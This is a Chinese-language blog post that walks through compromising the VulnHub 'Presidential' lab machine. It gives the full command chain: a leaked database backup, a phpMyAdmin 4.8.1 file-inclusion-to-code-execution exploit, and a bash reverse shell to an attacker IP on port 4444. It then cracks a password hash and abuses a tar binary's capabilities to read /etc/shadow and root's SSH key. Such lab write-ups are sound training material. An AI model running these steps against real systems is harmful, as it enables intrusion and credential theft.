声明
该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。
靶机地址:
https://download.vulnhub.com/presidential/Presidential.ova
内容简介:
主机发现
端口扫描
信息收集
备份文件
子域名爆破
phpmyadmin
密码爆破
本地文件包含
Capabilities
本地权限漏洞
SSH公钥认证
1.1 主机发现
arp-scan -l1.2 端口扫描
nmap -p- 192.168.144.218 1.3 信息搜集
nmap -p80,2082 -sV -sC 192.168.144.218打开web页面后,发现需要绑定域名
http://192.168.144.218/index.html192.168.144.218 votenow.local再次刷新访问
1.4 路径爬取
dirsearch -u http://192.168.144.218发现该网址下存在
view-source:http://votenow.local/config.php.bak$dbUser = "votebox";$dbPass = "casoj3FFASPsbyoRP";$dbHost = "localhost";$dbname = "votebox";
1.5 子域名爆破
gobuster vhost -u http://votenow.local/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt | grep "Status: 200"发现子域名 datasafe.votenow.local
绑定子域名 :
192.168.144.218 datasafe.votenow.localhttp://datasafe.votenow.local/
发现phpmyadmin
1.6 phpmyadmin
利用刚才发现的账号密码登录phpmyadmin
$dbUser = "votebox";$dbPass = "casoj3FFASPsbyoRP";
登录进入
在user表下发现账号密码
账号 | 密码 |
admin | $2y$12$d/nOEjKNgk/epF2BeAFaMu8hW4ae3JJk8ITyh48q97awT/G7eQ11i |
http://datasafe.votenow.local/README
查看phpmyadmin版本信息
1.7 文件包含
根据版本信息查历史存在漏洞
searchsploit phpmyadmin 4.8.1cp /usr/share/exploitdb/exploits/php/webapps/50457.py .python3 50457.py datasafe.votenow.local 80 / votebox casoj3FFASPsbyoRP whoamicp /usr/share/exploitdb/exploits/php/webapps/44928.txt .
文件包含利用方式
cp /usr/share/exploitdb/exploits/php/webapps/44928.txt .# Exploit Title: phpMyAdmin 4.8.1 - Local File Inclusion to Remote Code Execution# Date: 2018-06-21# Exploit Author: VulnSpy# Vendor Homepage: http://www.phpmyadmin.net# Software Link: https://github.com/phpmyadmin/phpmyadmin/archive/RELEASE_4_8_1.tar.gz# Version: 4.8.0, 4.8.1# Tested on: php7 mysql5# CVE : CVE-2018-126131. Run SQL Query : select '<?php phpinfo();exit;?>'2. Include the session file :http://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/session/sess_11njnj4253qq93vjm9q93nvc7p2lq82k
成功!!
找到session
i2n0csdmf78kkoseno75kp4jaa9stmk7拼接网址为
http://datasafe.votenow.local/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/session/sess_i2n0csdmf78kkoseno75kp4jaa9stmk7访问该网页
文件包含成功!
直接写入反弹shell命令
select '<?php system("bash -i >& /dev/tcp/192.168.144.247/4444 0>&1");exit;?>'http://datasafe.votenow.local/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/session/sess_seu20bv6tjd567k4ihafm3sgub4n2uq0//注意 每次 session 刷新 都要 更新 后面的链接
1.8 密码爆破
查看文件hash
cat hashcp /usr/share/wordlists/rockyou.txt.gz .gunzip rockyou.txt.gzjohn --wordlist=rockyou.txt hashsu admin // 密码为 Stella
爆破出密码 Stella
升级终端
python -c "import pty;pty.spawn('/bin/bash')"1.9 Capabilities
查看文件权限
getcap -r / 2>/dev/nullls -l /usr/bin/newuidmapls -l /usr/bin/tarS
查到tarS存在权限可以读+搜索权限
cd //返回根目录tarS -cvf shadow.tar /etc/shadow //打包lstar -xvf shadow.tar //解压cd etcchmod 777 shadowcat shadow // 读取文件
1.10 公钥认证登陆
公钥登陆
tarS -cvf k.tar /root/.ssh/id_rsatar -xvf k.tarcd root/.ssh/ssh -i id_rsa root@localhost -p 2082
成功。
注:如有侵权请后台联系进行删除
觉得内容不错,请点一下"赞"和"在看"
